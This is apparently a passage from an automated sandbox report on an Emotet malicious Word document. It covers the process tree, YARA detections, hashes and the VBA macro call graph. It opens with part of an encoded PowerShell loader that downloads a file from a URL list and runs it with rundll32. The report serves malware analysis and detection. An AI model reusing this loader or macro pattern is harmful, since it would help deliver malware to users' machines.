gACQASgByAG4AegBtAGsAcwAgACsAIAAkAFUAXwAyAEQAKQA7ACQAUQA5ADkAUAA9ACgAJwBGADgAJwArACcAOABTACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQATQB6AHUAYwBoAGoANgAgAGkAbgAgACQAWABhAHAAMQBsAG0AYQApAHsAdAByAHkAewAoAC4AKAAnAE4AJwArACcAZQB3AC0ATwBiACcAKwAnAGoAZQBjACcAKwAnAHQAJwApACAAcwB5AFMAVABlAE0ALgBuAGUAdAAuAFcARQBCAGMAbABpAGUATgB0ACkALgAiAGQATwBXAGAATgBMAE8AYQBEAGYAYABpAGAATABFACIAKAAkAE0AegB1AGMAaABqADYALAAgACQAWABkAG4ANQB4AGgAZwApADsAJABDADUANwBCAD0AKAAnAEMAMgAnACsAJwA5AEMAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQAnACsAJwB0AGUAJwArACcAbQAnACkAIAAkAFgAZABuADUAeABoAGcAKQAuACIAbABlAE4AYABHAGAAVABoACIAIAAtAGcAZQAgADQANwA2ADYAOQApACAAewAuACgAJwByAHUAJwArACcAbgBkAGwAbAAzADIAJwApACAAJABYAGQAbgA1AHgAaABnACwAKAAoACcAQQBuACcAKwAnAHkAUwB0ACcAKQArACcAcgAnACsAKAAnAGkAbgAnACsAJwBnACcAKQApAC4AIgB0AE8AUwBgAFQAcgBJAGAATgBHACIAKAApADsAJABNADMAOQBTAD0AKAAnAFEAJwArACgAJwA3ACcAKwAnADYATgAnACkAKQA7AGIAcgBlAGEAawA7ACQAWAA1ADEAWAA9ACgAJwBLADEAJwArACcANgBGACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARwA0AF8ARgA9ACgAJwBWADIAJwArACcAMQBYACcAKQA=
                                                                    Imagebase:0x13fb40000
                                                                    File size:473600 bytes
                                                                    MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Reputation:high

                                                                    Chronological Activities

                                                                    Analysis Process: rundll32.exe PID: 2724 Parent PID: 2452

                                                                    General

                                                                    Start time:18:03:43
                                                                    Start date:24/01/2021
                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Snuvw2w\V4651pz\H64C.dll AnyString
                                                                    Imagebase:0xff780000
                                                                    File size:45568 bytes
                                                                    MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate

                                                                    Chronological Activities

                                                                    Analysis Process: rundll32.exe PID: 2696 Parent PID: 2724

                                                                    General

                                                                    Start time:18:03:44
                                                                    Start date:24/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Snuvw2w\V4651pz\H64C.dll AnyString
                                                                    Imagebase:0xb40000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2107659481.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2107638490.0000000000160000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2108176213.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                    Reputation:moderate

                                                                    Chronological Activities

                                                                    Analysis Process: rundll32.exe PID: 824 Parent PID: 2696

                                                                    General

                                                                    Start time:18:03:48
                                                                    Start date:24/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Snuvw2w\V4651pz\H64C.dll',#1
                                                                    Imagebase:0xb40000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2115709278.0000000000250000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2119181462.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2115685260.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    Reputation:moderate

                                                                    Chronological Activities

                                                                    Analysis Process: rundll32.exe PID: 2432 Parent PID: 824

                                                                    General

                                                                    Start time:18:03:54
                                                                    Start date:24/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Psyzc\rrjb.eew',FkNpAoTRbYmZ
                                                                    Imagebase:0xb40000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2125452150.0000000000690000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2125404655.0000000000250000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2126211663.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                    Reputation:moderate

                                                                    Chronological Activities

                                                                    Analysis Process: rundll32.exe PID: 2512 Parent PID: 2432

                                                                    General

                                                                    Start time:18:03:58
                                                                    Start date:24/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Psyzc\rrjb.eew',#1
                                                                    Imagebase:0xb40000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2138353893.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2135403936.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2135436680.0000000000290000.00000040.00000001.sdmp, Author: Joe Security
                                                                    Reputation:moderate

                                                                    Chronological Activities

                                                                    Analysis Process: rundll32.exe PID: 2872 Parent PID: 2512

                                                                    General

                                                                    Start time:18:04:03
                                                                    Start date:24/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zeompoyzkid\lbzryxyiwk.tgo',MapzU
                                                                    Imagebase:0xb40000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2149603848.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2147996106.0000000000190000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2148213455.0000000000210000.00000040.00000001.sdmp, Author: Joe Security
                                                                    Reputation:moderate

                                                                    Chronological Activities

                                                                    Analysis Process: rundll32.exe PID: 3064 Parent PID: 2872

                                                                    General

                                                                    Start time:18:04:08
                                                                    Start date:24/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zeompoyzkid\lbzryxyiwk.tgo',#1
                                                                    Imagebase:0xb40000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2158799762.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2157690183.0000000000230000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2157667927.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    Reputation:moderate

                                                                    Chronological Activities

                                                                    Analysis Process: rundll32.exe PID: 3016 Parent PID: 3064

                                                                    General

                                                                    Start time:18:04:13
                                                                    Start date:24/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fzcbciyn\hrzxfeb.tjx',mIFAsDzIotZuZ
                                                                    Imagebase:0xb40000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2166530116.0000000000240000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2166511135.0000000000160000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2167094683.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                    Reputation:moderate

                                                                    Chronological Activities

                                                                    Analysis Process: rundll32.exe PID: 3004 Parent PID: 3016

                                                                    General

                                                                    Start time:18:04:17
                                                                    Start date:24/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fzcbciyn\hrzxfeb.tjx',#1
                                                                    Imagebase:0xb40000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2176671171.0000000000210000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2176658564.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2180490151.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                    Reputation:moderate

                                                                    Chronological Activities

                                                                    Analysis Process: rundll32.exe PID: 268 Parent PID: 3004

                                                                    General

                                                                    Start time:18:04:22
                                                                    Start date:24/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jbfsrfqgbfhitpby\uwgzghumsjobone.nsu',iaFY
                                                                    Imagebase:0xb40000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2188345600.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2187673787.0000000000150000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2187719578.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    Reputation:moderate

                                                                    Chronological Activities

                                                                    Analysis Process: rundll32.exe PID: 2504 Parent PID: 268

                                                                    General

                                                                    Start time:18:04:27
                                                                    Start date:24/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jbfsrfqgbfhitpby\uwgzghumsjobone.nsu',#1
                                                                    Imagebase:0xb40000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2197495102.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2199714499.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2197524650.0000000000210000.00000040.00000001.sdmp, Author: Joe Security
                                                                    Reputation:moderate

                                                                    Chronological Activities

                                                                    Analysis Process: rundll32.exe PID: 2556 Parent PID: 2504

                                                                    General

                                                                    Start time:18:04:32
                                                                    Start date:24/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ktcrhcwi\dlsvvuq.xcm',WysFLGeRRae
                                                                    Imagebase:0xb40000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2207082899.0000000000260000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2207752996.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2207040108.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security

                                                                    Chronological Activities

                                                                    Analysis Process: rundll32.exe PID: 620 Parent PID: 2556

                                                                    General

                                                                    Start time:18:04:36
                                                                    Start date:24/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ktcrhcwi\dlsvvuq.xcm',#1
                                                                    Imagebase:0xb40000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2218991532.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2217422949.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2217659193.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security

                                                                    Chronological Activities

                                                                    Analysis Process: rundll32.exe PID: 2288 Parent PID: 620

                                                                    General

                                                                    Start time:18:04:41
                                                                    Start date:24/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lpubpgqoe\ouvofhit.lrs',ZENT
                                                                    Imagebase:0xb40000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000013.00000002.2226062410.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000013.00000002.2226800833.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000013.00000002.2226045292.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security

                                                                    Chronological Activities

                                                                    Analysis Process: rundll32.exe PID: 1928 Parent PID: 2288

                                                                    General

                                                                    Start time:18:04:45
                                                                    Start date:24/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lpubpgqoe\ouvofhit.lrs',#1
                                                                    Imagebase:0xb40000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000014.00000002.2339396360.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000014.00000002.2341403788.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000014.00000002.2339372095.0000000000150000.00000040.00000001.sdmp, Author: Joe Security

                                                                    Chronological Activities

                                                                    Disassembly

                                                                    Code Analysis

                                                                    VBA Code

                                                                    Call Graph

                                                                    Graph

                                                                    Module: Tvh1u8793dltn9

                                                                    Declaration
                                                                    LineContent
                                                                    1

                                                                    Attribute VB_Name = "Tvh1u8793dltn9"

                                                                    2

                                                                    Attribute VB_Base = "1Normal.ThisDocument"

                                                                    3

                                                                    Attribute VB_GlobalNameSpace = False

                                                                    4

                                                                    Attribute VB_Creatable = False

                                                                    5

                                                                    Attribute VB_PredeclaredId = True

                                                                    6

                                                                    Attribute VB_Exposed = True

                                                                    7

                                                                    Attribute VB_TemplateDerived = True

                                                                    8

                                                                    Attribute VB_Customizable = True

                                                                    Executed Functions
                                                                    Subroutine Document_open, APIs: 89, Strings: 0, Number of lines: 3, Relevance: 135.003
                                                                    APIsMeta Information

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: IFmVwCk

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Paragraphs

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: UBound

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: PwelHHe

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: MidB$

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Ga63a6ozyok1lu

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Content

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: P74x_w06z8wy

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: DOUPnxsoh

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Paragraphs

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: UBound

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: tmhzE

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: MidB$

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: obTyv

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Paragraphs

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: UBound

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: JoHgzC

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: MidB$

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: BYQeC

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Paragraphs

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: UBound

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: PpRoB

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: MidB$

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: OfcyMA

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Paragraphs

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: UBound

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: VFEoD

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: MidB$

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Mid

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Name

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Application

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: AOSGE

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Paragraphs

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: UBound

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: zIlZF

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: MidB$

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: IeEnJ

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Paragraphs

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: UBound

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: PRawGB

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: MidB$

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: NDNfzBJJ

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Paragraphs

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: UBound

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: BLbjEJvG

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: MidB$

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: CreateObject

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: BeNoB

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Paragraphs

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: UBound

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: qqdsB

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: MidB$

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Mid

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Len

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: SlFMhE

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Paragraphs

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: UBound

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: TtNYEBE

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: MidB$

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Create

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Koy_r2oxzs1

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: X2yj58n39t50co

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: kxpwbBJF

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Paragraphs

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Range

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: UBound

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: UYxXOcIJG

                                                                    Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: MidB$

                                                                    LineInstructionMeta Information
                                                                    9

                                                                    Private Sub Document_open()

                                                                    10

                                                                    Cfqzsexf2_k

                                                                    executed
                                                                    11

                                                                    End Sub

                                                                    Module: Twh1gb2mpd3

                                                                    Declaration
                                                                    LineContent
                                                                    1

                                                                    Attribute VB_Name = "Twh1gb2mpd3"

                                                                    Module: X1bqz0qaer43b52bf

                                                                    Declaration
                                                                    LineContent
                                                                    1

                                                                    Attribute VB_Name = "X1bqz0qaer43b52bf"

                                                                    Executed Functions
                                                                    Function Cfqzsexf2_k, APIs: 145, Strings: 71, Number of lines: 234, Relevance: 388.734
                                                                    APIsMeta Information

                                                                    IFmVwCk

                                                                    Paragraphs

                                                                    Range

                                                                    Range

                                                                    UBound

                                                                    PwelHHe

                                                                    MidB$

                                                                    Ga63a6ozyok1lu

                                                                    Content

                                                                    P74x_w06z8wy

                                                                    DOUPnxsoh

                                                                    Paragraphs

                                                                    Range

                                                                    Range

                                                                    UBound

                                                                    tmhzE

                                                                    MidB$

                                                                    obTyv

                                                                    Paragraphs

                                                                    Range

                                                                    Range

                                                                    UBound

                                                                    JoHgzC

                                                                    MidB$

                                                                    BYQeC

                                                                    Paragraphs

                                                                    Range

                                                                    Range

                                                                    UBound

                                                                    PpRoB

                                                                    MidB$

                                                                    OfcyMA

                                                                    Paragraphs

                                                                    Range

                                                                    Range

                                                                    UBound

                                                                    VFEoD

                                                                    MidB$

                                                                    Mid

                                                                    Name

                                                                    Application

                                                                    AOSGE

                                                                    Paragraphs

                                                                    Range

                                                                    Range

                                                                    UBound

                                                                    zIlZF

                                                                    MidB$

                                                                    IeEnJ

                                                                    Paragraphs

                                                                    Range

                                                                    Range

                                                                    UBound

                                                                    PRawGB

                                                                    MidB$

